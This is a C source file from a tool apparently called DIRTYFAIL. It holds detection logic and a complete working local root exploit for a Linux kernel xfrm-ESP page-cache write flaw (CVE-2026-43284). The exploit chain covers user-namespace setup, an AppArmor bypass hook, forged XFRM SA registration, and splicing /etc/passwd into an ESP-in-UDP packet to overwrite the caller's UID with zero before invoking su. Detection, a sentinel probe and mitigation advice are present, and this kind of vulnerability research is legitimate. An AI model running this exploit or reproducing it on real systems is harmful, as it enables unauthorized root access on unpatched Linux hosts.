/* * DIRTYFAIL — dirtyfrag_esp.c — Dirty Frag xfrm-ESP variant * CVE-2026-43284 * * BACKGROUND * ---------- * In Linux, esp_input() runs the AEAD decryption in-place on the * incoming skb. Before that, an skb whose payload sits in a frag (i.e. * not in the linear head — the case that arises when userspace plants * a page via splice()) is supposed to be cloned out into kernel-owned * memory by skb_cow_data(). The bug: * * if (!skb_cloned(skb)) { * if (!skb_is_nonlinear(skb)) { * nfrags = 1; * goto skip_cow; * } else if (!skb_has_frag_list(skb)) { * nfrags = skb_shinfo(skb)->nr_frags; * nfrags++; * goto skip_cow; // <-- vulnerable branch * } * } * * If the skb has frags but no frag_list, esp_input skips the COW and * runs in-place AEAD on the user-supplied page. The same authencesn * scratch-write that powers Copy Fail then lands at file offset * (assoclen + cryptlen) inside that page. The 4 STOREd bytes are * `seq_hi` from the SA's replay_esn state, which userspace controls * via XFRMA_REPLAY_ESN_VAL on SA registration. * * Net result: same 4-byte arbitrary-offset write into a page-cache * page as Copy Fail, but reachable via the xfrm path *even when * algif_aead is blacklisted as a Copy Fail mitigation*. * * COST: registering an XFRM SA needs CAP_NET_ADMIN, so the attacker * must enter a fresh user namespace first. This is allowed by default * on most distros except hardened Ubuntu (AppArmor restrict_unprivileged_userns). * * DETECTION STRATEGY * ------------------ * Precondition-based: we report VULNERABLE when *all* of these hold: * - kernel >= 4.10 (commit cac2661c53f3, 2017-01-17) and not patched * - esp4 module loadable (we don't insmod; rely on autoload) * - unprivileged user namespace creation works * * Avoiding the actual primitive in detect mode keeps the system * undisturbed (no namespaces created in the parent, no encap sockets, * no transient SAs). The exploit path runs the full primitive for real. 
* * EXPLOIT STRATEGY * ---------------- * Same UID-flip as Copy Fail, but driven through xfrm: * * 1. fork() — parent stays in init userns to call su afterwards * 2. child: unshare(CLONE_NEWUSER | CLONE_NEWNET) * 3. child: write deny → /proc/self/setgroups * 4. child: write "0 1" → /proc/self/uid_map (and gid_map) * 5. child: ioctl SIOCSIFFLAGS to bring lo UP * 6. child: open NETLINK_XFRM, register SA with: * proto=ESP, mode=TRANSPORT, flags=XFRM_STATE_ESN, * alg=authencesn(hmac(sha256),cbc(aes)) (zero keys), * encap=ESPINUDP sport=dport=4500, * replay_esn.seq_hi = "0000" (the 4 bytes that will land) * 7. child: open udp_recv @ 127.0.0.1:4500 with UDP_ENCAP_ESPINUDP * and udp_send connected to 127.0.0.1:4500 * 8. child: pipe(); vmsplice forged ESP wire header (24 bytes) → * splice /etc/passwd at uid_off, len 16 → splice pipe → udp_send * 9. child: recvmsg drives the kernel through the esp_input path, * firing the 4-byte STORE of "0000" into /etc/passwd * at the user's UID offset * 10. child: exits, parent verifies via fresh open of /etc/passwd * 11. parent: execlp("su", username) — PAM checks /etc/shadow on * disk (untouched), gets right password, setuid(0) lands * us at root because the page-cache copy of /etc/passwd * now lists us as UID 0. */ #include "dirtyfrag_esp.h" #include "apparmor_bypass.h" #include #include #include #include #include #include #ifdef __linux__ #include #include #include #include #include #include #include #include #endif /* UDP_ENCAP / UDP_ENCAP_ESPINUDP live in , but that header * conflicts with over `struct udphdr` and we don't * actually need the struct. The kernel constants are stable, so we * just hard-code them as fallbacks (the #ifndef makes this a no-op if * the toolchain happens to expose them already). 
*/ #ifndef UDP_ENCAP #define UDP_ENCAP 100 #endif #ifndef UDP_ENCAP_ESPINUDP #define UDP_ENCAP_ESPINUDP 2 #endif #ifndef IPPROTO_ESP #define IPPROTO_ESP 50 #endif #ifndef __linux__ #define CLONE_NEWUSER 0x10000000 #define CLONE_NEWNET 0x40000000 #define IFF_UP 0x01 #define IFF_RUNNING 0x40 #define SIOCSIFFLAGS 0x8914 struct sockaddr_in { int dummy; }; struct ifreq { int dummy; }; __attribute__((unused)) static ssize_t splice (int a, void *b, int c, void *d, size_t e, unsigned f) { (void)a;(void)b;(void)c;(void)d;(void)e;(void)f; errno=ENOSYS; return -1; } __attribute__((unused)) static ssize_t vmsplice(int a, const struct iovec *b, unsigned long c, unsigned d) { (void)a;(void)b;(void)c;(void)d; errno=ENOSYS; return -1; } __attribute__((unused)) static int ioctl (int a, unsigned long b, ...) { (void)a;(void)b; errno=ENOSYS; return -1; } #else extern ssize_t splice(int fd_in, loff_t *off_in, int fd_out, loff_t *off_out, size_t len, unsigned int flags); extern ssize_t vmsplice(int fd, const struct iovec *iov, unsigned long nr, unsigned int flags); #endif #define ENCAP_PORT 4500 #define ESP_SPI 0xDEADBE10 #define MARKER "0000" #define ALG_NAME "authencesn(hmac(sha256),cbc(aes))" /* ---------------------------------------------------------------- * * Detection * ---------------------------------------------------------------- */ df_result_t dirtyfrag_esp_detect(void) { log_step("Dirty Frag — xfrm-ESP variant (CVE-2026-43284) — detection"); int km = -1, kn = -1; if (kernel_version(&km, &kn)) log_hint("kernel %d.%d.x", km, kn); /* The vulnerable branch was introduced in 2017 (cac2661c53f3) and * the upstream fix is f4c50a4034e6 (2026-05-07). We can't easily * tell whether a particular distro kernel has the backport, so we * report based on prereq presence and let the operator decide. */ /* esp4 / esp6 modules. They autoload on first XFRM SA registration, * but we want to know if the build supports them at all. 
/proc/modules * lists currently-loaded; that's a strong positive signal. */ bool esp4 = kmod_loaded("esp4"); bool esp6 = kmod_loaded("esp6"); log_hint("esp4 currently loaded: %s", esp4 ? "yes" : "no"); log_hint("esp6 currently loaded: %s", esp6 ? "yes" : "no"); bool userns = unprivileged_userns_allowed(); log_hint("unprivileged user namespace: %s", userns ? "allowed" : "DENIED"); if (!userns) { log_ok("xfrm-ESP variant unreachable without unprivileged userns"); log_hint("on Ubuntu, this is the expected hardening — but the RxRPC " "variant of Dirty Frag may still be reachable. Run with " "--check-rxrpc."); return DF_PRECOND_FAIL; } if (!esp4 && !esp6) { log_hint("no esp4/esp6 currently loaded; the kernel will autoload them " "on first SA registration. We treat this as still vulnerable."); } /* On hardened distros (Ubuntu 26.04+) caps are stripped inside the * userns even after our bypass — kernel may still have the bug but * unprivileged users can't reach it. Report that honestly rather * than claiming VULNERABLE. */ if (apparmor_userns_caps_blocked()) { log_ok("LSM-mitigated — kernel may still have the bug but the AppArmor " "policy denies CAP_NET_ADMIN inside any unprivileged userns."); log_hint("unprivileged exploitation is blocked; real root can still " "reach the kernel bug. 
Apply the kernel patch as soon as your " "distro ships it."); return DF_PRECOND_FAIL; } if (dirtyfail_active_probes) { log_step("--active set: firing v4 ESP-in-UDP trigger against /tmp sentinel"); df_result_t pr = dirtyfrag_esp_active_probe(); if (pr == DF_VULNERABLE || pr == DF_OK || pr == DF_PRECOND_FAIL) return pr; log_warn("active probe inconclusive — falling back to precondition verdict"); } log_warn("VULNERABLE (preconditions met) — userns + xfrm SA registration " "available, kernel within affected window"); log_warn("apply mainline patch f4c50a4034e6 or your distro's backport"); log_warn("interim mitigation: `dirtyfail --mitigate` or manually blacklist " "esp4/esp6 in /etc/modprobe.d/"); log_hint("re-run with `--scan --active` for an empirical sentinel-STORE probe"); return DF_VULNERABLE; } /* ---------------------------------------------------------------- * * Exploit — only compiled with full bodies on Linux. * ---------------------------------------------------------------- */ #ifdef __linux__ /* Write a small string to a /proc file. */ static bool write_proc(const char *path, const char *value) { int fd = open(path, O_WRONLY); if (fd < 0) return false; ssize_t want = strlen(value); ssize_t got = write(fd, value, want); close(fd); return got == want; } /* ---- Netlink XFRM SA registration --------------------------------- * * * The XFRM SA registration is built by hand. Each attribute is a 4-byte * aligned struct rtattr { u16 rta_len; u16 rta_type; } followed by * payload. The total nlmsg length is filled in last. * * Register an XFRM_MSG_NEWSA carrying our marker in replay_esn.seq_hi. 
*/
/*
 * nl      netlink socket the request is sent on (callers in this file
 *         create it with NETLINK_XFRM and bind it first)
 * seq_hi  4 bytes copied verbatim into replay_esn.seq_hi
 *
 * Returns false when sendto() fails, when the reply is shorter than a
 * netlink header, or when the reply is an NLMSG_ERROR with a non-zero
 * error code (which is also logged). Returns true otherwise.
 *
 * NOTE(review): only the first message of the reply is inspected, and
 * any reply type other than NLMSG_ERROR counts as success.
 */
static bool xfrm_register_sa(int nl, const unsigned char seq_hi[4])
{
    /* NOTE(review): buf is a char array accessed through struct
     * pointers; this relies on the array being suitably aligned. */
    char buf[2048] = {0};
    struct nlmsghdr *nlh = (struct nlmsghdr *)buf;
    struct xfrm_usersa_info *usa = (struct xfrm_usersa_info *)NLMSG_DATA(nlh);

    nlh->nlmsg_type = XFRM_MSG_NEWSA;
    nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK;
    nlh->nlmsg_seq = 1;

    /* Selector: src/dst 127.0.0.1, IPv4 */
    usa->sel.daddr.a4 = htonl(0x7f000001);
    usa->sel.saddr.a4 = htonl(0x7f000001);
    usa->sel.family = AF_INET;
    usa->sel.prefixlen_d = 32;
    usa->sel.prefixlen_s = 32;

    /* SA identity: destination, SPI and protocol. */
    usa->id.daddr.a4 = htonl(0x7f000001);
    usa->id.spi = htonl(ESP_SPI);
    usa->id.proto = IPPROTO_ESP;
    usa->saddr.a4 = htonl(0x7f000001);

    /* All four lifetime limits are set to the maximum 64-bit value. */
    usa->lft.soft_byte_limit = (uint64_t)-1;
    usa->lft.hard_byte_limit = (uint64_t)-1;
    usa->lft.soft_packet_limit = (uint64_t)-1;
    usa->lft.hard_packet_limit = (uint64_t)-1;

    usa->reqid = 0x1234;
    usa->family = AF_INET;
    usa->mode = XFRM_MODE_TRANSPORT;
    usa->replay_window = 0; /* SA-level: 0; ESN-level (below): 32 */
    usa->flags = XFRM_STATE_ESN;

    /* Attributes are appended at abuf; `attrs` is the running byte
     * count of everything appended so far. */
    size_t hdrlen = sizeof(*nlh) + sizeof(*usa);
    size_t attrs = 0;
    char *abuf = buf + hdrlen;

    /*
     * The kernel's xfrm code does NOT accept `authencesn(...)` as a
     * single XFRMA_ALG_AEAD attribute — it's a composition that has
     * to be assembled from separate auth + crypt parts. We register:
     *   XFRMA_ALG_AUTH_TRUNC : hmac(sha256) with 32-byte key, 128-bit ICV
     *   XFRMA_ALG_CRYPT      : cbc(aes) with 16-byte key
     *
     * The kernel internally wires these into authencesn(hmac(sha256),
     * cbc(aes)) when it sees XFRM_STATE_ESN on the SA.
     */
    { /* XFRMA_ALG_AUTH_TRUNC */
        struct xfrm_algo_auth *aa;
        unsigned short dlen = sizeof(*aa) + 32; /* HMAC-SHA256 key */
        struct rtattr *r = (struct rtattr *)(abuf + attrs);
        r->rta_type = XFRMA_ALG_AUTH_TRUNC;
        r->rta_len = RTA_LENGTH(dlen);
        aa = (struct xfrm_algo_auth *)RTA_DATA(r);
        /* Zeroing the payload also leaves the key bytes all-zero. */
        memset(aa, 0, dlen);
        strncpy(aa->alg_name, "hmac(sha256)", sizeof(aa->alg_name) - 1);
        aa->alg_key_len = 32 * 8; /* bits */
        aa->alg_trunc_len = 128; /* bits — truncated MAC width */
        attrs += RTA_SPACE(dlen);
    }
    { /* XFRMA_ALG_CRYPT */
        struct xfrm_algo *ea;
        unsigned short dlen = sizeof(*ea) + 16; /* AES-128 key */
        struct rtattr *r = (struct rtattr *)(abuf + attrs);
        r->rta_type = XFRMA_ALG_CRYPT;
        r->rta_len = RTA_LENGTH(dlen);
        ea = (struct xfrm_algo *)RTA_DATA(r);
        /* Zeroing the payload also leaves the key bytes all-zero. */
        memset(ea, 0, dlen);
        strncpy(ea->alg_name, "cbc(aes)", sizeof(ea->alg_name) - 1);
        ea->alg_key_len = 16 * 8; /* bits */
        attrs += RTA_SPACE(dlen);
    }
    /* XFRMA_REPLAY_ESN_VAL — this is where seq_hi rides */
    {
        struct xfrm_replay_state_esn *esn;
        unsigned short dlen = sizeof(*esn) + 4; /* bmp_len * 4 = 4 */
        struct rtattr *r = (struct rtattr *)(abuf + attrs);
        r->rta_type = XFRMA_REPLAY_ESN_VAL;
        r->rta_len = RTA_LENGTH(dlen);
        esn = (struct xfrm_replay_state_esn *)RTA_DATA(r);
        memset(esn, 0, dlen);
        esn->bmp_len = 1;
        esn->oseq = 0;
        esn->seq = 100;
        esn->oseq_hi = 0;
        memcpy(&esn->seq_hi, seq_hi, 4); /* THE PRIMITIVE INPUT */
        esn->replay_window = 32;
        attrs += RTA_SPACE(dlen);
    }
    /* XFRMA_ENCAP — UDP encapsulation, sport=dport=4500 */
    {
        struct xfrm_encap_tmpl *enc;
        unsigned short dlen = sizeof(*enc);
        struct rtattr *r = (struct rtattr *)(abuf + attrs);
        r->rta_type = XFRMA_ENCAP;
        r->rta_len = RTA_LENGTH(dlen);
        enc = (struct xfrm_encap_tmpl *)RTA_DATA(r);
        memset(enc, 0, dlen);
        enc->encap_type = UDP_ENCAP_ESPINUDP;
        enc->encap_sport = htons(ENCAP_PORT);
        enc->encap_dport = htons(ENCAP_PORT);
        enc->encap_oa.a4 = 0;
        attrs += RTA_SPACE(dlen);
    }

    /* Total length is only known once every attribute is appended. */
    nlh->nlmsg_len = hdrlen + attrs;

    struct sockaddr_nl nladdr = { .nl_family = AF_NETLINK };
    if (sendto(nl, buf, nlh->nlmsg_len, 0,
               (struct sockaddr *)&nladdr, sizeof(nladdr)) < 0)
        return false;

    /* Drain ACK */
    char ack[4096];
    ssize_t n = recv(nl, ack, sizeof(ack), 0);
    if (n < (ssize_t)sizeof(struct nlmsghdr))
        return false;
    struct nlmsghdr *r = (struct nlmsghdr *)ack;
    if (r->nlmsg_type == NLMSG_ERROR) {
        struct nlmsgerr *e = (struct nlmsgerr *)NLMSG_DATA(r);
        /* error == 0 is the plain acknowledgement requested by NLM_F_ACK. */
        if (e->error != 0) {
            log_bad("XFRM_MSG_NEWSA: %s", strerror(-e->error));
            return false;
        }
    }
    return true;
}

/*
 * Bring loopback up inside the new netns.
 *
 * Sets IFF_UP | IFF_RUNNING on "lo" via SIOCSIFFLAGS on a throwaway
 * datagram socket. Returns true when the ioctl returned 0.
 *
 * NOTE(review): close() runs between the ioctl and the caller's
 * strerror(errno), so the errno the caller logs may not be the ioctl's.
 */
static bool bring_lo_up(void)
{
    int s = socket(AF_INET, SOCK_DGRAM, 0);
    if (s < 0)
        return false;
    struct ifreq ifr;
    memset(&ifr, 0, sizeof(ifr));
    strncpy(ifr.ifr_name, "lo", IFNAMSIZ - 1);
    ifr.ifr_flags = IFF_UP | IFF_RUNNING;
    int rc = ioctl(s, SIOCSIFFLAGS, &ifr);
    close(s);
    return rc == 0;
}

/* Trigger esp_input by sending a forged ESP-in-UDP packet whose payload
 * is a page-cache page from `target_path`, planted via splice at
 * `splice_off`. The kernel STORE lands ~14 bytes into the spliced
 * region (the v4 path has no V6_STORE_SHIFT-style offset).
 *
 * Returns false if any socket, open, pipe, vmsplice or splice step
 * fails; every descriptor opened so far is closed first. Returns true
 * once the packet has been handed to the sending socket, whatever the
 * final recv() yields. */
static bool trigger_store_at(const char *target_path, loff_t splice_off)
{
    /* udp_recv: bound to 127.0.0.1:4500 with UDP_ENCAP_ESPINUDP set so
     * incoming UDP frames are rerouted into xfrm_input -> esp_input. */
    int udp_recv = socket(AF_INET, SOCK_DGRAM, 0);
    if (udp_recv < 0)
        return false;
    struct sockaddr_in addr = {
        .sin_family = AF_INET,
        .sin_port = htons(ENCAP_PORT),
        .sin_addr.s_addr = htonl(0x7f000001),
    };
    int reuse = 1;
    /* Return value intentionally not checked here. */
    setsockopt(udp_recv, SOL_SOCKET, SO_REUSEADDR, &reuse, sizeof(reuse));
    if (bind(udp_recv, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
        log_bad("bind udp_recv: %s", strerror(errno));
        close(udp_recv);
        return false;
    }
    int encap = UDP_ENCAP_ESPINUDP;
    if (setsockopt(udp_recv, IPPROTO_UDP, UDP_ENCAP, &encap, sizeof(encap)) < 0) {
        log_bad("UDP_ENCAP_ESPINUDP: %s", strerror(errno));
        close(udp_recv);
        return false;
    }

    /* udp_send: connect to udp_recv. Packets we splice here will arrive
     * at udp_recv via loopback and feed xfrm_input. */
    int udp_send = socket(AF_INET, SOCK_DGRAM, 0);
    if (udp_send < 0) {
        close(udp_recv);
        return false;
    }
    if (connect(udp_send, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
        log_bad("connect udp_send: %s", strerror(errno));
        close(udp_recv);
        close(udp_send);
        return false;
    }

    /* Build wire ESP header: SPI(4) || seq_no(4) || IV(16) = 24 bytes.
     * IV value doesn't matter — auth check fails after the STORE.
     *
     * NOTE(review): the two stores below write uint32_t through a cast
     * of an unsigned char array; memcpy from a local uint32_t would
     * avoid the alignment and aliasing assumptions. */
    unsigned char wire_hdr[24];
    *(uint32_t *)(wire_hdr + 0) = htonl(ESP_SPI);
    *(uint32_t *)(wire_hdr + 4) = htonl(101); /* seq_no_lo */
    memset(wire_hdr + 8, 0xCC, 16);

    /* Open the target file for splicing. */
    int pfd = open(target_path, O_RDONLY);
    if (pfd < 0) {
        log_bad("open %s: %s", target_path, strerror(errno));
        close(udp_recv);
        close(udp_send);
        return false;
    }
    int p[2];
    if (pipe(p) < 0) {
        log_bad("pipe: %s", strerror(errno));
        close(pfd);
        close(udp_recv);
        close(udp_send);
        return false;
    }

    /* vmsplice the wire header into the pipe (24 bytes). */
    struct iovec iov = { .iov_base = wire_hdr, .iov_len = sizeof(wire_hdr) };
    if (vmsplice(p[1], &iov, 1, 0) != (ssize_t)sizeof(wire_hdr)) {
        log_bad("vmsplice header: %s", strerror(errno));
        close(p[0]);
        close(p[1]);
        close(pfd);
        close(udp_recv);
        close(udp_send);
        return false;
    }

    /* splice 16 bytes of target's page cache from splice_off. */
    loff_t off = splice_off;
    if (splice(pfd, &off, p[1], NULL, 16, SPLICE_F_MOVE) != 16) {
        log_bad("splice file->pipe: %s", strerror(errno));
        close(p[0]);
        close(p[1]);
        close(pfd);
        close(udp_recv);
        close(udp_send);
        return false;
    }

    /* splice the whole 40-byte payload from pipe to udp_send. */
    if (splice(p[0], NULL, udp_send, NULL, 24 + 16, SPLICE_F_MOVE) != 40) {
        log_bad("splice pipe->udp: %s", strerror(errno));
        close(p[0]);
        close(p[1]);
        close(pfd);
        close(udp_recv);
        close(udp_send);
        return false;
    }
    close(p[0]);
    close(p[1]);

    /* Drive the receive — esp_input runs inline here, performs the
     * scratch-write, and we don't really care about the actual recv
     * data (auth will fail with EBADMSG).
     *
     * The usleep is a best-effort delay, not a synchronization
     * primitive: it gives the in-place decrypt time to finish before
     * the sockets are torn down, since on a busy or slow VM splice()
     * can return before esp_input has actually fired. V4bel's
     * reference exploit uses the same 150ms wait. */
    usleep(150 * 1000);
    unsigned char drain[256];
    /* Non-blocking; the result is deliberately discarded. */
    (void)recv(udp_recv, drain, sizeof(drain), MSG_DONTWAIT);

    close(pfd);
    close(udp_recv);
    close(udp_send);
    return true;
}

/* Compatibility wrapper for the exploit path: target /etc/passwd. */
static bool trigger_store(off_t passwd_off)
{
    return trigger_store_at("/etc/passwd", passwd_off);
}

/*
 * Self-contained variant: unshare user+net namespaces, map the caller's
 * uid/gid to 0 inside them, bring lo up, register the SA and fire the
 * trigger at `passwd_off`. Returns 0 on success and 1 on any failure.
 *
 * Marked unused; no caller is visible in this file.
 * NOTE(review): presumably superseded by the apparmor_bypass_fork_arm()
 * path used by dirtyfrag_esp_exploit — confirm before removing.
 */
__attribute__((unused))
static int run_in_userns(off_t passwd_off, uid_t real_uid, gid_t real_gid)
{
    if (syscall(SYS_unshare, CLONE_NEWUSER | CLONE_NEWNET) != 0) {
        log_bad("unshare: %s", strerror(errno));
        return 1;
    }
    /* setgroups is written before the gid_map write below. */
    if (!write_proc("/proc/self/setgroups", "deny")) {
        log_bad("setgroups deny: %s", strerror(errno));
        return 1;
    }
    char map[64];
    /* Map format written here: "0 <outside id> 1". */
    snprintf(map, sizeof(map), "0 %u 1", (unsigned)real_uid);
    if (!write_proc("/proc/self/uid_map", map)) {
        log_bad("uid_map: %s", strerror(errno));
        return 1;
    }
    snprintf(map, sizeof(map), "0 %u 1", (unsigned)real_gid);
    if (!write_proc("/proc/self/gid_map", map)) {
        log_bad("gid_map: %s", strerror(errno));
        return 1;
    }
    if (!bring_lo_up()) {
        log_bad("bring lo up: %s", strerror(errno));
        return 1;
    }
    int nl = socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM);
    if (nl < 0) {
        log_bad("AF_NETLINK XFRM: %s", strerror(errno));
        return 1;
    }
    struct sockaddr_nl nla = { .nl_family = AF_NETLINK };
    if (bind(nl, (struct sockaddr *)&nla, sizeof(nla)) < 0) {
        log_bad("bind netlink: %s", strerror(errno));
        close(nl);
        return 1;
    }
    if (!xfrm_register_sa(nl, (const unsigned char *)MARKER)) {
        close(nl);
        return 1;
    }
    log_ok("XFRM SA registered with seq_hi='%s'", MARKER);
    if (!trigger_store(passwd_off)) {
        log_bad("trigger failed");
        close(nl);
        return 1;
    }
    log_ok("ESP-in-UDP trigger fired");
    close(nl);
    return 0;
}

#else /* __linux__ */

/* Non-Linux stub: always reports failure (returns 1). */
__attribute__((unused))
static int run_in_userns(off_t passwd_off, uid_t real_uid, gid_t real_gid)
{
    (void)passwd_off;
    (void)real_uid;
    (void)real_gid;
    return 1;
}

#endif

/* ---------------------------------------------------------------- *
 * INNER — runs in the AA bypass userns (post-stage 2).
 *
 * No user interaction, no fork, no verify, no su. Just the kernel
 * work: open netlink, register SA, fire splice trigger, exit.
 * The parent (init ns) owns everything else.
 *
 * Reads the target user name from DIRTYFAIL_TARGET_USER. Returns
 * DF_TEST_ERROR when that variable is missing, the user's UID field
 * cannot be located, or the field is not exactly 4 characters;
 * DF_EXPLOIT_FAIL when a netlink, SA-registration or trigger step
 * fails; DF_EXPLOIT_OK otherwise. Non-Linux builds always return
 * DF_TEST_ERROR.
 * ---------------------------------------------------------------- */
df_result_t dirtyfrag_esp_exploit_inner(void)
{
#ifdef __linux__
    const char *user = getenv("DIRTYFAIL_TARGET_USER");
    if (!user || !*user) {
        log_bad("inner: DIRTYFAIL_TARGET_USER not set");
        return DF_TEST_ERROR;
    }

    off_t uid_off;
    size_t uid_len;
    char uid_str[16];
    if (!find_passwd_uid_field(user, &uid_off, &uid_len, uid_str)) {
        log_bad("inner: find_passwd_uid_field('%s') failed", user);
        return DF_TEST_ERROR;
    }
    /* The marker is exactly 4 bytes, so the field must be too. */
    if (uid_len != 4) {
        log_bad("inner: UID '%s' is %zu chars; need 4", uid_str, uid_len);
        return DF_TEST_ERROR;
    }

    int nl = socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM);
    if (nl < 0) {
        log_bad("inner: AF_NETLINK XFRM: %s", strerror(errno));
        return DF_EXPLOIT_FAIL;
    }
    struct sockaddr_nl nla = { .nl_family = AF_NETLINK };
    if (bind(nl, (struct sockaddr *)&nla, sizeof(nla)) < 0) {
        log_bad("inner: bind netlink: %s", strerror(errno));
        close(nl);
        return DF_EXPLOIT_FAIL;
    }
    if (!xfrm_register_sa(nl, (const unsigned char *)MARKER)) {
        close(nl);
        return DF_EXPLOIT_FAIL;
    }
    log_ok("inner: XFRM SA registered with seq_hi='%s'", MARKER);

    if (!trigger_store(uid_off)) {
        close(nl);
        return DF_EXPLOIT_FAIL;
    }
    log_ok("inner: ESP-in-UDP trigger fired at uid_off=%lld", (long long)uid_off);
    close(nl);
    return DF_EXPLOIT_OK;
#else
    log_bad("dirtyfrag_esp_exploit_inner: Linux-only");
    return DF_TEST_ERROR;
#endif
}

/* ---------------------------------------------------------------- *
 * OUTER — runs in init namespace.
 *
 * Prompts the operator, sets env vars, fork → child arms AA bypass
 * and runs the inner. Parent stays in init ns, waits, reads the
 * global page cache to verify, then either:
 *   - do_shell=true:  execlp("su", user) — runs in init ns →
 *     PAM reads modified /etc/passwd → uid 0 → real init-ns root
 *   - do_shell=false: try_revert_passwd_page_cache, return.
 *
 * Returns DF_OK when already root or when the operator declines either
 * confirmation; DF_TEST_ERROR when the passwd entry cannot be resolved
 * or the UID field is not 4 characters; DF_EXPLOIT_FAIL when the inner
 * stage, the verification read, or execlp fails; DF_EXPLOIT_OK on the
 * do_shell=false path after verification. With do_shell=true and a
 * successful execlp this function does not return.
 * ---------------------------------------------------------------- */
df_result_t dirtyfrag_esp_exploit(bool do_shell)
{
    log_step("Dirty Frag (xfrm-ESP) — exploit");

    uid_t uid = getuid();
    if (uid == 0) {
        log_warn("already root in init namespace — nothing to escalate");
        return DF_OK;
    }

    struct passwd *pw = getpwuid(uid);
    if (!pw) {
        log_bad("getpwuid: %s", strerror(errno));
        return DF_TEST_ERROR;
    }
    /* NOTE(review): `user` aliases storage owned by getpwuid(), which
     * later getpw*() calls may overwrite. Confirm none of the helpers
     * called below perform such lookups, or copy the name first. */
    const char *user = pw->pw_name;

    off_t uid_off;
    size_t uid_len;
    char uid_str[16];
    if (!find_passwd_uid_field(user, &uid_off, &uid_len, uid_str)) {
        log_bad("could not find %s in /etc/passwd", user);
        return DF_TEST_ERROR;
    }
    log_step("/etc/passwd UID for %s: '%s' at offset %lld",
             user, uid_str, (long long)uid_off);
    if (uid_len != 4) {
        log_bad("UID '%s' is %zu chars; this technique needs exactly 4",
                uid_str, uid_len);
        return DF_TEST_ERROR;
    }

    /* Spell out what is about to happen before asking for consent. */
    log_warn("about to run xfrm-ESP page-cache write against /etc/passwd");
    log_warn("this enters a fresh user/net namespace, registers an XFRM SA, "
             "and sends an ESP-in-UDP packet whose payload is the /etc/passwd "
             "page from offset %lld", (long long)uid_off);
    log_warn("on success the page cache will report '%s' as UID 0", user);
    log_warn("cleanup: dirtyfail --cleanup, or `echo 3 > /proc/sys/vm/drop_caches`");

    if (!typed_confirm("DIRTYFAIL")) {
        log_bad("confirmation declined — aborting");
        return DF_OK;
    }
    if (!ssh_lockout_check(user)) {
        log_bad("SSH-lockout confirmation declined — aborting");
        return DF_OK;
    }

    /* Hand off to the inner via env vars + AA bypass fork.
     *
     * The child fork enters the bypass userns, runs
     * dirtyfrag_esp_exploit_inner (dispatched from main() based on
     * DIRTYFAIL_INNER_MODE), modifies the global page cache, exits.
     * We (parent, init ns) read the result via the same global page
     * cache and execlp(su) here in init ns for REAL root.
     *
     * NOTE(review): neither variable is unset afterwards (the active
     * probe does unset its own), so both stay in this process's
     * environment and are passed to the execlp() below. */
    setenv("DIRTYFAIL_INNER_MODE", "esp", 1);
    setenv("DIRTYFAIL_TARGET_USER", user, 1);

    int rc = apparmor_bypass_fork_arm(0, NULL); /* argc/argv unused for forked variant */
    if (rc != DF_EXPLOIT_OK) {
        log_bad("inner exploit failed (exit=%d)", rc);
        return DF_EXPLOIT_FAIL;
    }

    /* Verify in init namespace — page cache is global, so we see the
     * child's modification here. */
    int v = open("/etc/passwd", O_RDONLY);
    if (v < 0) {
        log_bad("verify open: %s", strerror(errno));
        return DF_EXPLOIT_FAIL;
    }
    if (lseek(v, uid_off, SEEK_SET) != uid_off) {
        close(v);
        return DF_EXPLOIT_FAIL;
    }
    char land[5] = {0};
    if (read(v, land, 4) != 4) {
        close(v);
        return DF_EXPLOIT_FAIL;
    }
    close(v);

    if (memcmp(land, MARKER, 4) != 0) {
        log_bad("write did not land — page cache reads '%.4s'", land);
        return DF_EXPLOIT_FAIL;
    }
    log_ok("page cache now reports %s with uid 0", user);

    if (!do_shell) {
        if (try_revert_passwd_page_cache())
            log_ok("page cache reverted (--no-shell)");
        else
            log_warn("page cache may still be modified — `sudo dirtyfail --cleanup` or reboot");
        return DF_EXPLOIT_OK;
    }

    log_ok("invoking 'su %s' in init namespace — enter your password for REAL root", user);
    execlp("su", "su", user, (char *)NULL);
    /* Only reached when execlp itself failed. */
    log_bad("execlp: %s", strerror(errno));
    return DF_EXPLOIT_FAIL;
}

/* ---------------------------------------------------------------- *
 * Active probe — used by `--scan --active`.
* * Same userns + XFRM SA + splice-trigger setup as the exploit, but * targets a sentinel file in /tmp instead of /etc/passwd. The parent * (init ns) reads the sentinel after the child returns and looks for * the marker bytes. * * If the marker landed → kernel STORE is reachable → DF_VULNERABLE. * If the page is intact → kernel is patched → DF_OK. * If AA blocks the bypass → DF_PRECOND_FAIL. * ---------------------------------------------------------------- */ df_result_t dirtyfrag_esp_active_probe_inner(void) { #ifdef __linux__ const char *sentinel = getenv("DIRTYFAIL_PROBE_SENTINEL"); if (!sentinel || !*sentinel) { log_bad("active-probe: DIRTYFAIL_PROBE_SENTINEL not set"); return DF_TEST_ERROR; } int nl = socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM); if (nl < 0) { log_bad("active-probe: netlink xfrm: %s", strerror(errno)); return DF_TEST_ERROR; } struct sockaddr_nl nla = { .nl_family = AF_NETLINK }; if (bind(nl, (struct sockaddr *)&nla, sizeof(nla)) < 0) { log_bad("active-probe: bind netlink: %s", strerror(errno)); close(nl); return DF_TEST_ERROR; } if (!bring_lo_up()) { log_bad("active-probe: bring lo up: %s", strerror(errno)); close(nl); return DF_TEST_ERROR; } if (!xfrm_register_sa(nl, (const unsigned char *)MARKER)) { close(nl); return DF_TEST_ERROR; } if (!trigger_store_at(sentinel, 0)) { close(nl); return DF_TEST_ERROR; } close(nl); return DF_EXPLOIT_OK; #else return DF_TEST_ERROR; #endif } df_result_t dirtyfrag_esp_active_probe(void) { /* Sentinel file: 4 KiB of 'A' bytes. */ char tmpl[] = "/tmp/dirtyfail-esp-probe.XXXXXX"; int sfd = mkstemp(tmpl); if (sfd < 0) { log_bad("probe mkstemp: %s", strerror(errno)); return DF_TEST_ERROR; } unsigned char filler[4096]; memset(filler, 'A', sizeof(filler)); if (write(sfd, filler, sizeof(filler)) != (ssize_t)sizeof(filler)) { close(sfd); unlink(tmpl); return DF_TEST_ERROR; } close(sfd); /* Fault the page in. 
